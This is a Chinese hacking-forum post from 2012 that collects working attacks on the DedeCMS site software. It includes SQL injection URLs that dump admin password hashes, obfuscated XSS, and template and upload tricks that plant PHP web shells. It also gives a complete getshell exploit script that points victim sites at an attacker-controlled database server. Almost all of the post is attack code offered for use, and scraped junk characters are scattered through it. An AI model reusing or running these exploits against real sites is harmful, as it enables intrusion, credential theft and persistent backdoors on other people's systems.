找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3036|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/ ^4 a) m% a6 ~: ?1 u
Dedecms 5.6 rss注入漏洞1 h$ K3 C% B" p! V
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1( k  _$ B" R# h% G! B/ |

9 y4 R* R0 E) E5 R! B: Y' }, ]& @; x

' J" T8 I$ k+ V, n5 s' z- i# P
/ i' z' |/ l( m) k) S4 s4 T2 v& Y' s0 F

( g7 e5 n7 r/ c- L! D9 k0 o9 b( S- K/ R. t3 v' ~

% Z  ~5 Y/ \* \+ u' O, w) iDedeCms v5.6 嵌入恶意代码执行漏洞: l& R0 q  `- E4 _0 {( T
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}0 x, q- ?* U! D5 @$ g* ~( o8 ^
发表后查看或修改即可执行  Z2 U( |% ~2 ]; I3 t% k" g) s
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}( H4 _* S' p" y1 i. o
生成x.php 密码xiao,直接生成一句话。# |7 p9 H. T: @! D) O' R

, A8 l1 k: M5 f" y3 `
' k% {/ O7 A9 a: X, \
$ X  X1 t" g/ J0 }
8 [5 c2 P  d8 i  \
. N: x* u- D, u3 \3 O3 P
2 ]% c4 s4 w  D& ^2 ^# P# h5 b, o7 H+ \" |8 i7 H* J/ O
3 ]; D0 z$ n8 t7 v; V
Dede 5.6 GBK SQL注入漏洞. ~* ^* g# g% {0 a. z2 W
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';% \; a& {3 i3 W( c7 q
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
, z$ Y: y, y( {7 \& J$ Whttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7' {! v4 V0 g4 B( ]' q) U* V
. }* B$ I& D3 s+ n3 B. H

! `) Q9 R$ {6 Q/ I' n4 A, H' s- A

! J7 X8 L6 C9 C3 o% H7 V
# e, G, o' Y. [) U! p0 j% }0 w4 _

1 U) J2 n7 S5 O4 }6 y3 z$ t) s) r; g) I2 A: u' s+ i% K3 F
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
, d2 W  }+ a" A8 L1 I# L) n
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
. s2 N+ f( n  ~2 l+ s# B4 c- L9 A7 k1 B6 B1 b

* L- H* D6 {% b) O9 W3 w; J) o) h- m  o* r
% @8 Y5 @  f5 ?2 _
5 g) E! B; O% d9 D, e' j

: f" M' C6 N6 B/ mDEDECMS 全版本 gotopage变量XSS漏洞
" o4 Y  L3 B5 i: Y2 X1 u3 B# j1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 1 g4 s) o% `% N1 H, j3 X
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
/ C. O3 E5 e6 |  O* O( I( @7 l/ d
( d8 X# K6 e1 }3 H/ A, _
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。   z. g& W( X3 B# {* i
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
3 h. P9 ~9 a% T0 e( N
3 a; A3 |! H, E0 g, S6 u, ]# j, ]1 B& X( [9 [9 _* Y, Z
http://v57.demo.dedecms.com/dede/login.php+ E2 \4 }9 W1 {  C, q

- N2 C3 E  R; H5 g/ j) D0 d$ G! ]) R& e: {
color=Red]DeDeCMS(织梦)变量覆盖getshell" x: Z/ {; f5 d( Y/ E
#!usr/bin/php -w* B9 ^7 H. N3 q0 f9 \
<?php1 c  y( b1 K2 C; g
error_reporting(E_ERROR);
# A- p0 i. ~8 R! o/ gset_time_limit(0);
* m5 b  Z2 N! u7 J7 ~print_r('
  r* I  D  W# w: n8 m. ?! QDEDEcms Variable Coverage. ^& ?# l' ^4 [( D( r4 T) k# S
Exploit Author:
www.heixiaozi.comwww.webvul.com
* f9 u$ Z/ G  l. {7 ~- \);
3 u, x; U  W( g8 H- zecho "\r\n";5 c5 Y! P9 }9 \2 B% }
if($argv[2]==null){
. \1 W' d9 g. Qprint_r('- \! r+ A% B' L9 {+ Q7 b
+---------------------------------------------------------------------------+
* R' r+ S. e! L1 y6 DUsage: php '.$argv[0].' url aid path' K9 B' m6 R5 b; |
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/% s  ~0 h6 v2 ?5 J
Example:
) }5 N2 ^6 C1 D2 G* j6 x# D) P+ Fphp '.$argv[0].'
www.site.com 1 old
7 j& j3 S& c" R+---------------------------------------------------------------------------+. x% q. x' S; l9 R
');" K8 R8 G  c9 s0 R+ g2 d
exit;
$ g  ^8 A# t1 _: e$ k; w8 W/ \}
' e% M; U6 {: G6 o, a- t6 M$url=$argv[1];
3 G: }6 v, V' T$aid=$argv[2];8 _+ w4 O; K9 @3 w% Z, s
$path=$argv[3];
7 n) v& U) ^8 N0 z! }, E6 K$exp=Getshell($url,$aid,$path);- ~8 V; x( l( y5 \; X- z* D
if (strpos($exp,"OK")>12){5 B3 M8 G! o/ M! v( x1 w! t) a
echo "7 y9 C# Y' O/ _3 x5 }
Exploit Success \n";; L  v1 Q  ~7 l
if($aid==1)echo "
; S: u2 E9 q- e# z$ XShell:".$url."/$path/data/cache/fuck.php\n" ;& L5 w% [' T8 E# T' ^

& n% n4 R$ ?$ b5 I) A& o
$ e' ?( m- ^/ I1 x1 F% b) Aif($aid==2)echo "
2 X7 Y' b. {* ^. k& G( u- nShell:".$url."/$path/fuck.php\n" ;; o9 a9 F) I0 s: N6 }& `

8 r" p  S/ ]( a2 l2 X1 o$ ]$ W7 w
* c' U( t( ~. J4 E% q- x5 w  @: S6 Mif($aid==3)echo ", i( l" h( e" j! P% n# C  o8 a
Shell:".$url."/$path/plus/fuck.php\n";
8 b; y# @' C$ E; _% X1 w% C  f# V/ V: M7 M8 B1 r7 I
) T, O6 b% ^# c4 {$ ~4 V8 a" z8 n
}else{0 n( e' L- p7 }
echo "
' f3 {+ |7 v& a7 s+ fExploit Failed \n";
5 {! G+ d: Z" E}
( ~/ }. V" d" q" }/ zfunction Getshell($url,$aid,$path){
  R1 z: q0 G4 D( r( i$id=$aid;
" Z( I% F) o% G- v7 B" d7 l% d4 G9 I' z$host=$url;
4 W$ P! E  ]" w1 _2 K8 H* c$port="80";
: S. J. P0 A% u% m1 T2 k; H$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
7 Y3 T5 C" h& {+ }$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
! [8 u1 t0 T9 i$data .= "Host: ".$host."\r\n";
3 v, C0 Q& m' Y) \$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
* w. ^% P' T1 G- v$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";3 \. l% h6 i& x+ a9 e, U
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";/ w" v8 p5 n, [. `
//$data .= "Accept-Encoding: gzip,deflate\r\n";
" _+ b! p3 e$ @9 Q1 J$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";; k% s+ W4 S; b8 c9 L7 I1 v
$data .= "Connection: keep-alive\r\n";0 a' O, V& u2 P- ?0 C
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";4 H7 Y" h' k. o/ u/ W& q
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";" R% C, n8 k6 E0 A- l! g( T
$data .= $content."\r\n";
6 p! ]& @  F' @# J5 t$ock=fsockopen($host,$port);2 T# D% E/ w" [0 E9 @; [/ I* _
if (!$ock) {" L2 A9 D/ I6 f2 `; y$ T0 P- f+ B+ p
echo "* z: a$ B, k% \0 S
No response from ".$host."\n";
7 |1 V' O( `& j7 L6 e# P( u  |}
: O* ]" y$ g9 w; _fwrite($ock,$data);1 @+ a& ?0 L9 L- E6 \
while (!feof($ock)) {& e2 g2 e6 a5 x/ Y$ g6 a  _# m; d
$exp=fgets($ock, 1024);& I/ s: d8 f+ \+ m) Z% P/ b5 g
return $exp;
* s; E9 m3 C* |}. O8 J" g3 E! t+ @: O9 v" J$ G* ~
}2 {+ I8 e4 t3 R6 O4 D: x3 X6 b

- @' [) g2 }. J) s0 E4 X
5 F, C; P$ L$ k; o% }?>
5 U! E6 e; P  z1 P& W
5 _9 v# {* w; Y; h2 Q1 P
; r  t2 R7 D9 }" l+ z2 m. i
& h9 i. L1 u" U4 e  j% O  A$ w; K, ?+ z  v1 L, }# K/ @/ l
4 z! V2 i: k6 k1 P
( B' i, E( `- y
' Z# Z" E* X8 A/ U2 k

/ U) i5 q4 k6 {# I1 m8 `' q
: [8 \  m) `1 [7 w6 a( V2 E
9 _, W& F$ A; t5 M" B% A5 {DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
+ ~$ E( O5 S; l$ i% i
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
& f3 m% m+ Z" k2 x) V' \1 v- r$ m& O

+ ~# {1 a7 |  s6 N# o8 \, k* [把上面validate=dcug改为当前的验证码,即可直接进入网站后台& t, [' J! v- a

: E3 p* k- X) o9 {7 Z
7 A/ E2 f) a: ~* n此漏洞的前提是必须得到后台路径才能实现3 l/ n$ j- G& D
  g/ L5 G4 a, A) V: t' e
5 B2 [" Q( Z1 Y( N
  o/ T- N2 Z* H" H9 w3 @: K" N7 g
7 e9 ^/ G4 G# O( k! ?( t2 j* t0 P
: A4 d0 C9 E' ]; r* _' u
( D1 h5 [& f0 d$ X
7 @. ?, L) t$ s1 X

* [. Q0 K+ S3 C9 H0 h# b4 |, j
5 t) K3 V8 K/ i0 b& i1 |
& w5 Y+ ]& v1 w- Q$ [. x5 Q  ODedecms织梦 标签远程文件写入漏洞  ?6 u, n) }1 l: ?  P- y( Q
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');3 u# \# g0 @/ G. w" Z! R
( x. Y' Z7 b$ L# e5 A% [

9 i1 R6 @) L( ^) A. }& B4 y% J1 ?4 d6 Z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
$ f, ^, y3 D9 [3 U* }" X# L( L<form action="" method="post" name="QuickSearch" id="QuickSearch">$ h5 T1 x6 x( `+ Q6 C
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />  U4 S" V# O. y9 d6 F; d
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
3 B. ?% Y$ R& T<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />: b- c- S* `  [7 v
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />4 N: I( A$ h' l" L) E- r! j& Y
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />- R- M6 i) w; L, `" r0 F  c4 B
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( P' F1 L! z5 `0 \. _
<input type="text" value="true" name="nocache" style="width:400">
  g2 J- F5 S/ y: J<input type="submit" value="提交" name="QuickSearchBtn"><br />+ i5 D  `( s: v0 u& ^) d7 R" @  |
</form>
. v9 T( f$ O- N: t; C, L# t<script>5 T8 o# ^8 z/ R' ~, Y6 v/ M
function addaction()" O# s7 g3 D2 G4 C' _7 P6 s. f$ r
{
* f- W: z: ^& W4 z  G8 ndocument.QuickSearch.action=document.QuickSearch.doaction.value;
; D, h0 j& y( o- n) P1 s( [& ^5 j}' j" K3 i7 x) W; ^, d
</script>. \4 {( ?. x+ `( u  W5 p

7 U0 Z+ d6 l2 C: m& h# [
" f7 R- P: d2 _9 ?- c3 X' ]
+ v8 Y* k2 u% l9 O5 u+ a3 [1 p$ @3 v0 x- Q+ J7 k/ e* R8 R

1 z6 N8 N; G! N% w: ?8 \+ i0 [4 p  V0 i: w8 ]: }

6 }" H) r/ h: I: ?1 c" {4 {5 v3 B
4 M4 z! }5 G  U: ]9 a, G; I6 g/ h1 K8 c9 y7 f/ b
3 ?5 S+ T9 n, {$ {" w' _! F( m. m' I
DedeCms v5.6 嵌入恶意代码执行漏洞
3 X% b! t2 H$ W* J注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行/ P. V7 x) _( r
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 }' \& ?$ K3 C, `0 Y, X3 T
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
7 }8 v' }) O! Y; {5 BDedecms <= V5.6 Final模板执行漏洞; y' w4 i* e: U  k$ \+ [
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
3 L- F' d  v0 a& ^; uuploads/userup/2/12OMX04-15A.jpg
9 V8 q2 ]; o, g: w% j+ U
9 K( g# G9 [$ `' i8 x# t- }) O3 N+ V6 p! T1 o
模板内容是(如果限制图片格式,加gif89a):
* P) c- r+ s# H- y5 T" |' G{dede:name runphp='yes'}7 I3 ?1 G; |  E/ b* C
$fp = @fopen("1.php", 'a');) O8 `! {4 f- O
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");8 E$ k! C. A8 t) V2 [, h! y# d" K
@fclose($fp);
( O$ s# S/ h  |( `' V( W; Y{/dede:name}! j: V8 F4 V9 X, O' g2 E
2 修改刚刚发表的文章,查看源文件,构造一个表单:# O( L) }; L* B
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">; \+ m9 `, ?: u6 o& K5 E2 \
<input type="hidden" name="dopost" value="save" />
7 q) l$ v6 e% ~/ k1 J<input type="hidden" name="aid" value="2" />
! e# G' _4 f3 S" j3 G<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
; [/ g! S) X) S+ Q4 O7 K. D$ h. |<input type="hidden" name="channelid" value="1" />
3 D( d4 L; Y* B<input type="hidden" name="oldlitpic" value="" />) t) H6 q# _9 c. |8 i6 m
<input type="hidden" name="sortrank" value="1275972263" />/ r+ i, h" g/ U+ x- _, [

- i8 T5 i6 G3 U: g; m9 R! e/ l2 r- B+ S
<div id="mainCp">
7 t- x. {& M6 {$ S<h3 class="meTitle"><strong>修改文章</strong></h3>
' H# Q- y# S. R/ Z& U' s- H& w) @' N5 }! W6 `! ^) z' U. [7 K

, a0 I; ^! E" ^<div class="postForm">2 \- V2 y/ v# b6 u& s- U
<label>标题:</label>3 B5 ^: K8 M+ l6 g
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
1 m" ~  u5 ^- W7 i* C) L# }
1 H- i5 m5 ~- R' s) d! _
( |( v# G5 C5 ?# A. t0 _<label>标签TAG:</label>$ w3 k5 A: ~& k6 O2 N/ J) _4 k$ h
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
; O+ [' U) b* {+ V4 `+ M& n5 M. e- F; Z

9 ^8 J6 x9 B- z& x8 h. k1 x- j<label>作者:</label>
) B: v* x1 b6 S6 F' Q$ O' K8 a* ^<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
0 b3 c" u  E5 V2 p! b' y2 l7 N  T. g
+ }; x$ O6 [) U1 @( c" p9 ]. Z% v4 b  {
<label>隶属栏目:</label>
  k' Q$ T9 G6 H( Y0 a7 ?' i<select name='typeid' size='1'>
; y- u& Q9 i. ]<option value='1' class='option3' selected=''>测试栏目</option>+ o# }  B' _' J$ o- K1 Z3 L! w
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类). Y( T' t4 v8 ^
: Z9 i6 r, @6 n$ z# h+ v

) T1 s6 l! R/ A/ t# A) X, Q+ b<label>我的分类:</label>0 t+ `! `0 M' a3 u% ^
<select name='mtypesid' size='1'>! T7 c& N9 X9 T6 K
<option value='0' selected>请选择分类...</option>
# |. M7 K' h( D# N<option value='1' class='option3' selected>hahahha</option>' [4 L+ W4 u$ e( {5 e* j3 s$ w; \
</select>
$ U5 I9 ]7 J1 L8 h5 P4 o& x; Y. i0 e6 A  u1 J) }; |% o0 h

+ o9 {1 l* a; A; V4 Z<label>信息摘要:</label>
7 D% q3 ~9 k$ P+ x7 Y5 U/ f<textarea name="description" id="description">1111111</textarea>! |% Q0 w7 A/ z$ V9 [# j7 P2 h
(内容的简要说明)6 {  @1 o0 H# [. J$ ~
, }) ^0 ], ?' ~( T& G! {) N0 [

" p0 @6 C2 g: U9 F, V$ r9 B<label>缩略图:</label>+ C, U& x( Z% @% O" a3 \% ~* F9 P& w
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
4 {' n; A+ k) V9 p( Z0 B+ {' E
) Y8 t6 u; n) Z! W- w5 k2 x1 s3 f5 d6 @7 p2 U- |* n" M
<input type='text' name='templet'
/ Z& H6 V9 l2 x/ N- @0 Z, Dvalue="../ uploads/userup/2/12OMX04-15A.jpg">) I2 O& A/ w2 b. y. c% i  s
<input type='text' name='dede_addonfields'- H2 S% P6 p, E6 r9 ?. a
value="templet,htmltext;">(这里构造)/ m+ }4 `. C- @! @, p
</div>) c0 k, h* }4 }3 B, R( a

6 `+ i7 S' R# c) n3 v
1 M9 K: H" g- K! \" \: P8 R9 N<!-- 表单操作区域 -->! B# A0 X2 N  d4 M( W
<h3 class="meTitle">详细内容</h3>
& G6 b/ `: d4 \) n' K+ A
( j3 z* B& R6 H8 O2 p$ o, s. Y% z& M' B
<div class="contentShow postForm">
, ]3 h8 L# ~1 u4 Y0 |<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
4 K- |& G* o( S2 J; {! }/ E$ M. a( t& c

! D7 W- l9 ?$ f; ?* S0 A; b<label>验证码:</label>
6 ~) J! d* z) }<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />6 \+ `0 j8 J7 x
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
+ P. B1 a5 \5 t5 |* s
% j8 g# ^4 L8 z. k5 C+ N/ c
  h& v9 q; f4 Z! `7 G<button class="button2" type="submit">提交</button>
6 b% B2 e2 |- O; h) l9 s2 ]<button class="button2 ml10" type="reset">重置</button>
+ C4 ?; R, o' L3 R# F+ B6 z</div>$ U! f/ m3 ]" E! F8 J8 N* T0 X+ v1 _
. I* x+ J, t( F
) f# G# _& {5 p& f: p& E6 M7 D
</div>
. F" ~; }) i: h8 @4 o: c
9 ~: d1 m8 Q: r/ b3 i
( X. O1 O8 p3 _</form>
3 t$ {! [& r% B7 \3 f( {: f; E# _9 w& X$ Z, C

0 O9 h8 @0 H/ X/ U" K7 x" x提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
! u( y- l  a$ F# a* K+ |假设刚刚修改的文章的aid为2,则我们只需要访问:
0 a) y( D3 @) `
http://127.0.0.1/dede/plus/view.php?aid=2
4 Y' G3 B% O/ k- ]+ x即可以在plus目录下生成webshell:1.php6 l& D' X. b4 s7 k

! T, i' u# C' I* c  m! |- R, }; ~* z& S: ^
6 C: w% @$ |, J) X- w8 R9 k
, x' i# K9 I+ L1 r! S

) M! Z" y7 g" V' p* e, V
7 R- n2 t" ~* Q
% b3 p1 C) D2 y3 f1 c3 V1 e6 ]9 q) C* V# T" T! Q/ D; M; B
, @- f" Q- X) O- n
) x! \1 `9 V$ [) L
! J8 }; L% z3 r$ h7 ]
, t- I+ A5 T! K" f4 z* l/ f+ C. M
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)/ z7 w. T0 [5 a  G! R  m3 u
Gif89a{dede:field name='toby57' runphp='yes'}
& l" F0 Z3 M4 Q4 L" [! Mphpinfo();; N, U" h$ q- m; C  [4 V
{/dede:field}8 j0 m) \  a) C
保存为1.gif
. a$ ^( E$ Q. L<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 6 Q5 U6 l2 q. ]$ `
<input type="hidden" name="aid" value="7" />
( y8 z& X9 M1 D<input type="hidden" name="mediatype" value="1" /> / I# ]/ g4 L6 R# B
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
! C- u- f0 `4 K, X  D1 }<input type="hidden" name="dopost" value="save" />
% F  g4 l* V( r<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
- C: v) h' f- w3 t  b# v<input name="addonfile" type="file" id="addonfile"/> 4 ]* u0 H$ g2 N' i
<button class="button2" type="submit" >更改</button> + b. C+ Z6 c) X' i& {# \+ }
</form>
+ m5 v6 B  l# r; G$ P5 S: L' x+ Q  ?0 }3 P/ P# m' ?; n9 _" V

2 e+ k, B3 D# R: i9 {3 ]7 d! P构造如上表单,上传后图片保存为/uploads/userup/3/1.gif! d' F& }& h, I$ X5 U  \
发表文章,然后构造修改表单如下:
: ^7 c  z8 j  i
6 O" Z8 \7 I3 ?+ J/ X2 P) [$ Q) p+ I; P% N/ |* {2 J
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ; k' p0 d# Q8 O! E' d
<input type="hidden" name="dopost" value="save" />
! _& r5 a( v! G8 O' H( r<input type="hidden" name="aid" value="2" /> 8 [( f" a# F# Z1 {3 f
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 4 w; m2 E+ u# t8 X
<input type="hidden" name="channelid" value="1" /> ( w* I( F; d9 x# T+ Q
<input type="hidden" name="oldlitpic" value="" /> 7 T6 p5 T$ L5 z% [: k
<input type="hidden" name="sortrank" value="1282049150" /> % m  z" E; b1 Y) w
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
# j5 H, z5 ?( i9 A/ N<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>   v$ j7 L7 R4 c1 n* I
<select name='typeid' size='1'> 0 ?- E6 e9 E  w/ T; s& `
<option value='1' class='option3' selected=''>Test</option>
- L. J2 k0 u. ]# V<select name='mtypesid' size='1'>
- _4 Q- r9 C" G' t7 d3 G& S<option value='0' selected>请选择分类...</option> : d) `7 k8 \/ j
<option value='1' class='option3' selected>aa</option></select>
- y3 S) |) i5 S5 o4 y<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 4 @. D2 e- M& F% w1 V
<input type='hidden' name='dede_addonfields' value="templet"> ; x* L5 X/ j. m6 x& w5 b" S
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> & A6 [5 W$ J5 o  Q  Y( b
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 7 q  u- c" H4 H8 @
<button class="button2" type="submit">提交</button>
; l" Z1 h5 H, A6 s3 K2 E+ e8 O+ o</form>0 A6 g. z% D# K/ X$ U+ l

. s; U6 c* t( {( F  O$ Z* p# l/ J: y3 z, ~
  J+ w, F  M' {2 T! j
6 W: Z# b1 {. c& E7 Z' _

6 i; h6 ~6 w9 H2 }' S, P. F7 c" _/ m1 K( V5 G/ C2 |- n% F" ~

: k7 W" R  \- e1 d
; z" P; `3 a4 a! I
, s! N% d; x& E' x! j9 A0 r. ]3 @! A5 Y8 k. \* _" q# O1 e/ v
: j. o% Z/ t. B: u
7 e$ [; f5 f2 J3 X
织梦(Dedecms)V5.6 远程文件删除漏洞
" D* X& D2 y: \+ u6 Q( N" [
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif  E$ b. b! A7 V" c/ M4 z

- `: Z3 Y* f& |$ ^; H6 J7 {' s! {# \+ d0 {  B8 {) x
3 M3 t' s2 R+ I
8 e# t. ~0 F& K6 J8 c; L0 I

# S! I4 K, L8 p
8 e: ~$ D- _& s" v; _  n5 x* Z. m! C/ W* _' z  ~6 S

& ]* |  U* a- I7 _2 E! p
& g$ U  K% O4 K, E, M
( B$ u, S$ L2 l织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
  U6 b' c! V9 a# a! d
http://www.test.com/plus/carbuya ... urn&code=../../
6 K5 T0 R) N* _* h% p9 q3 ^1 A
9 g* e  J. [: s# ]3 ]7 L
6 G. S3 I) U/ n, [; X& X  l! i; I' G/ c5 ~# \
% o% p! N4 p: {

( R' t) l% V0 L/ \' Z- E
( w5 a6 ^# z4 m- f) o7 S
8 V) g2 R  M5 E, Q2 }8 U0 a2 H' e, W. z$ R4 k( ?
- N8 p( u8 k' P4 g/ s& z2 D

+ g( h/ k9 }- F1 \8 |- Z3 L# zDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
4 t3 Z0 W0 R* `! f- O, j. R6 tplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`" c- R0 \" x, V1 j+ \9 |. h
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
* K9 ^: x# n( @1 i; S4 N& X- H; I! i. r8 \, y
+ l+ {' e/ b: B! q7 d
1 a0 X$ ]. r1 p
6 @; k1 v7 B$ S+ Z9 T

6 g& h& K4 ~6 v5 m; J
1 Q  J( q# l) \8 D2 d# Q# ^  D2 a3 a

6 q& b5 K. C  C8 O5 Q3 q
+ r* p9 Q0 u: B) \  ?9 ]* H3 `. }# V+ s
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞3 `: y9 J; @8 R0 e) c
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='# a" u( [8 \6 M% P; v

. x: Q) x& p" b( e9 Q- {: F$ c( g! C/ I/ H0 W- x* ~

' H- D/ F" @# z: C" f/ f! [0 u3 f, \% j6 D' B
, O& X( y. U1 S& a; c- e

* ?( V2 b/ o4 i0 j/ d' e
